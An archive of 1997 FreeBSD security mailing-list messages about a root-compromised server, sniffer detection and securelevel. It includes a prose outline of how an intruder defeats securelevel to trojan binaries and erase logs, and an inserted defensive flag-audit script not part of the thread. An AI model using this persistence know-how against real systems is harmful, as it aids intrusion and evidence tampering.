Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18292 for ; Mon, 28 Jul 1997 17:45:47 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA27651; Mon, 28 Jul 1997 20:45:40 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA09946; Mon, 28 Jul 1997 20:45:39 -0400 (EDT)
To: "Nicole H."
cc: Brian Buchanan, security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
In-reply-to: Your message of "Mon, 28 Jul 1997 04:40:47 -0800."
Date: Mon, 28 Jul 1997 20:45:39 -0400
Message-ID: <9944.870137139@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

"Nicole H." wrote in message ID :

> What is the range of sniffing? I.E. can the "sniffer" sniff past
> switched networks?

Not without access to the switch to reprogram it (not all switches
allow that mode anyhow).

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 17:48:48 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18497 for security-outgoing; Mon, 28 Jul 1997 17:48:48 -0700 (PDT)
Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18484 for ; Mon, 28 Jul 1997 17:48:39 -0700 (PDT)
Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA03760; Mon, 28 Jul 1997 20:47:48 GMT
Date: Mon, 28 Jul 1997 20:47:48 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Vincent Poy
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hrm, that's weird. I just tried it myself and it kills them all. Maybe
you've got a bad compile? How about a kill -9?

-------------------------------------------------------------------------
Jonathan A. Zdziarski                        NetRail Incorporated
Server Engineering Manager                   230 Peachtree St. Suite 500
jonz@netrail.net                             Atlanta, GA 30303
http://www.netrail.net                       (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Vincent Poy wrote:

:On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
:
:=)Actually if you kill the root httpd the others do die (or are supposed to)
:
:	I tried it before but it doesn't die... Only the master ones die.
:
:
:Cheers,
:Vince - vince@MCESTATE.COM - vince@GAIANET.NET
:Unix Networking Operations - FreeBSD-Real Unix for Free
:GaiaNet Corporation - M & C Estate
:Beverly Hills, California USA 90210
:HongKong Stars/Gravis UltraSound Mailing Lists Admin
:
:

From owner-freebsd-security Mon Jul 28 17:50:28 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18684 for security-outgoing; Mon, 28 Jul 1997 17:50:28 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18679 for ; Mon, 28 Jul 1997 17:50:26 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07448; Mon, 28 Jul 1997 17:50:06 -0700 (PDT)
Date: Mon, 28 Jul 1997 17:50:06 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

=)Hrm that's weird. I just tried it myself and it kills them all. Maybe
=)you've got a bad compile? How about a kill -9?

	I always used kill -9 and I don't think it's a bad compile because
it's now at 1.3 and happened from the days of 1.1.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 17:52:19 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18962 for security-outgoing; Mon, 28 Jul 1997 17:52:19 -0700 (PDT)
Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18946 for ; Mon, 28 Jul 1997 17:52:14 -0700 (PDT)
Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA03967; Mon, 28 Jul 1997 20:51:23 GMT
Date: Mon, 28 Jul 1997 20:51:22 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Vincent Poy
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hrm, if you always use kill -9 try the reverse, just a kill or a kill -15

-------------------------------------------------------------------------
Jonathan A. Zdziarski                        NetRail Incorporated
Server Engineering Manager                   230 Peachtree St. Suite 500
jonz@netrail.net                             Atlanta, GA 30303
http://www.netrail.net                       (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Vincent Poy wrote:

:On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
:
:=)Hrm that's weird. I just tried it myself and it kills them all. Maybe
:=)you've got a bad compile? How about a kill -9?
:
:	I always used kill -9 and I don't think it's a bad compile because
:it's now at 1.3 and happened from the days of 1.1.
:
:
:Cheers,
:Vince - vince@MCESTATE.COM - vince@GAIANET.NET
:Unix Networking Operations - FreeBSD-Real Unix for Free
:GaiaNet Corporation - M & C Estate
:Beverly Hills, California USA 90210
:HongKong Stars/Gravis UltraSound Mailing Lists Admin
:
:

From owner-freebsd-security Mon Jul 28 17:54:19 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19087 for security-outgoing; Mon, 28 Jul 1997 17:54:19 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19077 for ; Mon, 28 Jul 1997 17:54:15 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA29489; Mon, 28 Jul 1997 20:54:00 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA12857; Mon, 28 Jul 1997 20:53:59 -0400 (EDT)
To: Vincent Poy
cc: "Nicole H.", Robert Watson, "[Mario1-]", JbHunt, security@FreeBSD.ORG, Tomasz Dudziak
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 17:40:28 PDT."
Date: Mon, 28 Jul 1997 20:53:59 -0400
Message-ID: <12855.870137639@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :

> 	It seems the interface always goes into promiscuous mode though.

Err? Not on my systems it doesn't.

> 	Hmmm, if BPF isn't there, how will utils like trafshow work to
> track people down?

Track what people down?

It's really a choice. You can run a secure shell server or you can run
a shell server which, if hacked, becomes a real threat. I've taken
certain liberties locally (bpf is still compiled in), but since the
machine is right behind me (literally), and carefully watched, I'm not
particularly worried right now.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 17:55:40 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19177 for security-outgoing; Mon, 28 Jul 1997 17:55:40 -0700 (PDT)
Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19172 for ; Mon, 28 Jul 1997 17:55:38 -0700 (PDT)
Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA04153 for ; Mon, 28 Jul 1997 20:55:00 GMT
Date: Mon, 28 Jul 1997 20:55:00 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: security@freebsd.org
Subject: Location of login source
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hrm, I don't have a /usr/src/usr.bin. I'm running 2.2.2 - is it elsewhere?
Is it available via ftp?

-------------------------------------------------------------------------
Jonathan A. Zdziarski                        NetRail Incorporated
Server Engineering Manager                   230 Peachtree St. Suite 500
jonz@netrail.net                             Atlanta, GA 30303
http://www.netrail.net                       (888) - NETRAIL
-------------------------------------------------------------------------

From owner-freebsd-security Mon Jul 28 17:58:13 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19424 for security-outgoing; Mon, 28 Jul 1997 17:58:13 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19419; Mon, 28 Jul 1997 17:58:09 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07482; Mon, 28 Jul 1997 17:58:05 -0700 (PDT)
Date: Mon, 28 Jul 1997 17:58:05 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: "Jordan K. Hubbard", security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <9758.870137085@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Gary Palmer wrote:

=)Vincent Poy wrote in message ID
=):
=)> On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:
=)>
=)> =)I think you are describing the symptom, not the problem.
=)> =)
=)> =)This looks very much like a system which was broken into and then
=)> =)trojan'd to allow easier, more invisible access. How do you know,
=)> =)for example, that your telnetd is really telnetd? Did you verify that? ;)
=)>
=)> 	Well, because I connect to the system using telnet ;) Also, this
=)> guy has been known to break in to machines
=)> (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked
=)> irc.hardlink.com. I think this person goes around hacking machine after
=)> machine, and nobody does anything about it.
=)
=)If this hack caused loss of service, notify your local (or state)
=)police. They'll do something.

	It's out of state and notifying the FBI would take some time and
they would do more damage to the system.

=)> =)Also, I'd check that inetd.conf file again and make _really sure_ you
=)> =)haven't left remote shell access enabled - a lot of people miss that
=)> =)because it's not explicitly labelled "rlogin" like they might expect.
=)
=)> 	I checked and disabled everything except telnetd in
=)> /etc/inetd.conf and rebooted the machine and then he kicked all of us who
=)> are admins out and shutdown the system.
=)
=)Vince, I hate to say this, but you really need to learn more about
=)administering a system. Do you use SSH for secure access for people who
=)have root access? If not, you are *ASKING* to be hacked every day of
=)the week. If you don't use SSH, do you use one-time passwords
=)(e.g. skey?) How do you know your telnetd binary is what it claims to
=)be? Your machine has been compromised to the *ROOT* level. *EVERY*
=)single binary and file on that machine *COULD HAVE BEEN REPLACED*.

	We're not using ssh but was planning to do so until this happened.
I telneted in to make sure that it was really telnet and checked the file
size/dates and other info with another machine to verify it. We're not
using one time passwords either. The break in according to the hacker was
done because of a security hole in perl5.00401 and the default .rhosts
file that came with the root account so they were able to login to the
other machine to do damage. The hacker was not interested in
mercury.GAIANET.NET even though that was where he did the hack from using
perl. After the hack was done, he just rlogin to earth which is where he
had no shell access before.

=)Take that machine off the net *NOW* and work on it from console. If
=)that is not an option, then you really need to start learning (fast)
=)about just what a hacker can do to your system. If he really has that
=)level of access, you are *SCREWED* right now without console
=)access. Even if you put sshd on there now, he could have it replaced
=)with his own version before you could make use of it and kick him off.

	All the machines are already unreachable and off the net. All of
the admins including me run the machine remotely since the owners are the
only ones who are local and they are out of the country for the next 4
months so there isn't any way to do it on the console.

=)And I must say, if you haven't taken reasonable steps to secure your
=)admin sessions, and following the security and cvs mailing lists for
=)bugs, then you really have been asking for this. I know (from
=)experience) just what it takes to run a shell server, and just what
=)hackers these days can do with 5 minutes of their spare time.

	I did follow the security and cvs mailing list for bugs, that's
why I make the necessary changes to the systems every time a new security
exploit is reported just to be on the safe side.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 18:01:42 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA19816 for security-outgoing; Mon, 28 Jul 1997 18:01:42 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA19809; Mon, 28 Jul 1997 18:01:37 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id SAA07502; Mon, 28 Jul 1997 18:01:25 -0700 (PDT)
Date: Mon, 28 Jul 1997 18:01:25 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: "Nicole H.", Robert Watson, "[Mario1-]", JbHunt, security@FreeBSD.ORG, Tomasz Dudziak
Subject: Re: security hole in FreeBSD
In-Reply-To: <12855.870137639@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Gary Palmer wrote:

=)Vincent Poy wrote in message ID
=):
=)> 	It seems the interface always goes into promiscuous mode though.
=)
=)Err? Not on my systems it doesn't.

	It seems to happen on every machine including fresh installed
ones. This is from dmesg:

ed1: promiscuous mode enabled
ed1: promiscuous mode enabled
ed1: promiscuous mode enabled

=)> 	Hmmm, if BPF isn't there, how will utils like trafshow work to
=)> track people down?
=)
=)Track what people down?

	Track people who ping icmp flood the machine since that's what
trafshow is for.

=)It's really a choice. You can run a secure shell server or you can run
=)a shell server which, if hacked, becomes a real threat. I've taken
=)certain liberties locally (bpf is still compiled in), but since the
=)machine is right behind me (literally), and carefully watched, I'm not
=)particularly worried right now.

	I watch the machines like 20 hours a day almost and no one even
knows I'm logged on when I'm using screen sessions. And I never su unless
necessary.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 18:02:43 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA19896 for security-outgoing; Mon, 28 Jul 1997 18:02:43 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA19890 for ; Mon, 28 Jul 1997 18:02:39 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id SAA07515; Mon, 28 Jul 1997 18:02:17 -0700 (PDT)
Date: Mon, 28 Jul 1997 18:02:17 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

=)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15

	I did that too. Even kill -HUP only kills the master process. I
had to kill the child process manually.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 18:20:24 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA20967 for security-outgoing; Mon, 28 Jul 1997 18:20:24 -0700 (PDT)
Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA20958; Mon, 28 Jul 1997 18:20:17 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id VAA27284; Mon, 28 Jul 1997 21:20:06 -0400 (EDT)
Date: Mon, 28 Jul 1997 21:20:05 -0400 (EDT)
From: Brian Buchanan
To: Gary Palmer
cc: security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
In-Reply-To: <8208.870136587@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Gary Palmer wrote:

> Brian Buchanan wrote in message ID
> :
> > I was wondering the same thing when I read a clause prohibiting the use of
> > network cards in promiscuous mode in the CMU network use policy. I asked
> > some computer security people I knew about this and their response was
> > that it is not possible to detect if a network card is in promiscuous mode
> > unless you have access to the machine it's in - i.e., that you can look at
> > ifconfig on that machine.
>
> That only works if ifconfig has not been altered to hide the flag.

That wasn't my point. My point was that it's not possible to detect it
without access to the local box. If you had root access you could always
query the card itself to see if it was set promiscuous.

From owner-freebsd-security Mon Jul 28 18:25:52 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA21258 for security-outgoing; Mon, 28 Jul 1997 18:25:52 -0700 (PDT)
Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA21253 for ; Mon, 28 Jul 1997 18:25:46 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id VAA27288; Mon, 28 Jul 1997 21:24:56 -0400 (EDT)
Date: Mon, 28 Jul 1997 21:24:56 -0400 (EDT)
From: Brian Buchanan
To: Vincent Poy
cc: freebsd-security@freebsd.org
Subject: Re: securelevel (was: Re: security hole in FreeBSD)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Brian Buchanan wrote:
>
> =)Uh, that would defeat the purpose of securelevel. It's not supposed to be
> =)possible to ever lower it, except when dropping into single-user mode, and
> =)even allowing init to do so in that instance is risky IMHO - a few months
> =)ago I reported a hole, which I believe was fixed, that made it possible to
> =)lower the securelevel by attaching a debugger to init. Even though that's
> =)plugged now, it's still possible that there's another way to fool the
> =)kernel into thinking that process 1 is requesting that securelevel be
> =)lowered.
>
> 	Anything is possible since nothing is unhackable. Would running
> init at securelevel 2 and then have it reboot multi-user at a lower level
> be possible?

That defeats it just the same. The attacker breaks in, reboots the system
into multi-user with securelevel 0, removes schg flags, alters init, the
kernel, /bin/login, whatever, kills the logs, raises securelevel back to 2
to cover his tracks.

Allowing the securelevel to be lowered and the system to return to
multi-user mode without operator confirmation is a bad thing - it
completely defeats its purpose. If it's not possible to do maintenance at
the local console, it's probably best not to use securelevel.
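The failure mode Brian describes above, as an added example that is not part of the thread and not FreeBSD's or any poster's code: the protections securelevel exists to back up, immutable (schg) system binaries and append-only (sappnd) logs, only bind root once kern.securelevel is 1 or higher, and a box whose level can be dropped and raised again without an operator at the console has neither. The script below takes a securelevel value and an `ls -lo` listing and reports what an intruder with root could still trojan or truncate. The listing is constructed sample data, and the choice of which directories must be immutable and which must be append-only is an assumption for the example.

```shell
#!/bin/sh
# securelevel_audit.sh: added example, not code from the thread or from FreeBSD.
# Given a securelevel and an `ls -lo` listing, report files an intruder who
# got root could still trojan (binaries lacking schg) or truncate (logs
# lacking sappnd), and warn when the securelevel is too low for those flags
# to bind root at all.

# Constructed sample of `ls -lo` output (FreeBSD prints the file flags in
# the fifth column, "-" when none are set).
SAMPLE_LS='-r-xr-xr-x  1 root  wheel  schg    12345 Jul 28  1997 /sbin/init
-r-sr-xr-x  1 root  wheel  -        9876 Jul 28  1997 /usr/bin/login
-rw-r--r--  1 root  wheel  sappnd    100 Jul 28  1997 /var/log/messages
-rw-r--r--  1 root  wheel  -         200 Jul 28  1997 /var/log/wtmp'

# missing_flag FLAG: read an `ls -lo` listing on stdin and print the path of
# every entry whose (comma-separated) flags field does not contain FLAG.
missing_flag() {
    awk -v want="$1" '
        NF >= 9 {
            n = split($5, f, ",")
            have = 0
            for (i = 1; i <= n; i++) if (f[i] == want) have = 1
            if (!have) print $NF
        }'
}

# flags_enforced LEVEL: succeeds when LEVEL is 1 or higher, the point from
# which the kernel refuses chflags noschg / nosappnd even for root. Below
# that the flags are advisory: the intruder clears them and carries on.
flags_enforced() {
    [ "$1" -ge 1 ] 2>/dev/null
}

# audit LEVEL LISTING: print one finding per line; returns 0 when clean.
# Which paths must be immutable and which append-only is an assumption.
audit() {
    level=$1
    listing=$2
    rc=0
    if ! flags_enforced "$level"; then
        echo "kern.securelevel=$level: file flags do not bind root, they are advisory only"
        rc=1
    fi
    for p in $(printf '%s\n' "$listing" | grep -E ' /(s?bin|usr/s?bin)/' | missing_flag schg); do
        echo "not immutable (schg): $p"
        rc=1
    done
    for p in $(printf '%s\n' "$listing" | grep ' /var/log/' | missing_flag sappnd); do
        echo "not append-only (sappnd): $p"
        rc=1
    done
    return $rc
}

# Stand-alone run over the constructed sample. On a real FreeBSD host the
# same check would be:
#   audit "$(sysctl -n kern.securelevel)" "$(ls -lo /sbin/* /usr/bin/login /var/log/*)"
audit 0 "$SAMPLE_LS" || echo "audit: problems found"
```

Run against the sample it reports the level-0 warning, /usr/bin/login without schg and /var/log/wtmp without sappnd. The point of the first check is Brian's: if the level can be lowered at will, the other two findings are moot, because root can clear the flags and put them back afterwards.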
From owner-freebsd-security Mon Jul 28 18:41:44 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA22427 for security-outgoing; Mon, 28 Jul 1997 18:41:44 -0700 (PDT)
Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA22419 for ; Mon, 28 Jul 1997 18:41:42 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id VAA29988; Mon, 28 Jul 1997 21:41:39 -0400 (EDT)
Date: Mon, 28 Jul 1997 21:41:38 -0400 (EDT)
From: "Matthew N. Dodd"
To: Vincent Poy
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:
> 	I know but when all the admins are remote, it has to be done
> multiuser. Is there a way to push the secure level up to 2 and then push
> it down when a make world is needed?

It wouldn't be very secure then would it.

/* Matthew N. Dodd                | A memory retaining a love you had for life
   winter@jurai.net               | As cruel as it seems nothing ever seems to
   http://www.jurai.net/~winter   | go right - FLA M 3.1:53 */

From owner-freebsd-security Mon Jul 28 18:59:58 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA23739 for security-outgoing; Mon, 28 Jul 1997 18:59:58 -0700 (PDT)
Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA23727 for ; Mon, 28 Jul 1997 18:59:54 -0700 (PDT)
Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id VAA04917; Mon, 28 Jul 1997 21:59:40 -0400 (EDT)
Date: Mon, 28 Jul 1997 21:59:39 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Brian Buchanan
cc: "Nicole H.", security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)

On Mon, 28 Jul 1997, Brian Buchanan wrote:

> On Mon, 28 Jul 1997, Nicole H. wrote:
>
> > Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a
> > machine running in promiscuous mode?
>
> I was wondering the same thing when I read a clause prohibiting the use of
> network cards in promiscuous mode in the CMU network use policy. I asked
> some computer security people I knew about this and their response was
> that it is not possible to detect if a network card is in promiscuous mode
> unless you have access to the machine it's in - i.e., that you can look at
> ifconfig on that machine.

As far as I know, there is no way to tell. The card has a filter on it that
normally just doesn't provide the packets that aren't intended for the host.
Promiscuous mode simply disables the filter. The only way to prevent the
packets from being sniffable is to prevent them from going on the wire in
question -- smart hubs (switches) do this, so are desirable. They also
increase available bandwidth, as only the required traffic goes on a
segment. They're also more expensive, although prices are really dropping.

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University    http://www.cmu.edu/
Network Security Research, Trusted Information Systems   http://www.tis.com/
Network Administrator, SafePort Network Services         http://www.safeport.com/
robert@fledge.watson.org  rwatson@tis.com  http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 19:02:02 1997
Date: Mon, 28 Jul 1997 22:01:00 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Vincent Poy
cc: "Matthew N. Dodd", security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Matthew N. Dodd wrote:
>
> =)On Mon, 28 Jul 1997, Vincent Poy wrote:
> =)> That wouldn't do any good if the user can chflags noschg on the
> =)> binaries you have schg on.
> =)
> =)'man init'
>
> True but if you needed to compile -current, you would need to
> remove the schg flags on some binaries before the make world.

Hence my suggestion that you boot from floppy. You now know you are
running the correct kernel, and have the required set of utilities to get
things going. To be entirely honest, if your system is that hacked to
pieces, you really need to reinstall. The chances of missing something at
this point are just too great.

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University    http://www.cmu.edu/
Network Security Research, Trusted Information Systems   http://www.tis.com/
Network Administrator, SafePort Network Services         http://www.safeport.com/
robert@fledge.watson.org  rwatson@tis.com  http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 19:03:07 1997
Date: Mon, 28 Jul 1997 19:01:51 -0700 (PDT)
From: Vincent Poy
To: "Matthew N. Dodd"
cc: security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Matthew N. Dodd wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)> I know but when all the admins are remote, it has to be done
=)> multiuser. Is there a way to push the secure level up to 2 and then push
=)> it down when a make world is needed?
=)
=)It wouldn't be very secure then would it.

You're right about that one. But wouldn't it still be possible to
kill the init process?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 19:05:45 1997
Date: Mon, 28 Jul 1997 19:04:35 -0700 (PDT)
From: Vincent Poy
To: Robert Watson
cc: "Matthew N. Dodd", security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Robert Watson wrote:

=)Hence my suggestion that you boot from floppy. You now know you are
=)running the correct kernel, and have the required set of utilities to get
=)things going. To be entirely honest, if your system is that hacked to
=)pieces, you really need to reinstall. The chances of missing something at
=)this point are just too great.

That would be true except none of the admins are local users. All of us
run the machine remotely. The owner who has physical access to the machines
is out of town for 2-4 months and people taking care of the Estate wouldn't
know what's what even if I guided them on the phone.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 19:20:14 1997
Date: Mon, 28 Jul 1997 22:20:05 -0400 (EDT)
From: "Matthew N. Dodd"
To: Vincent Poy
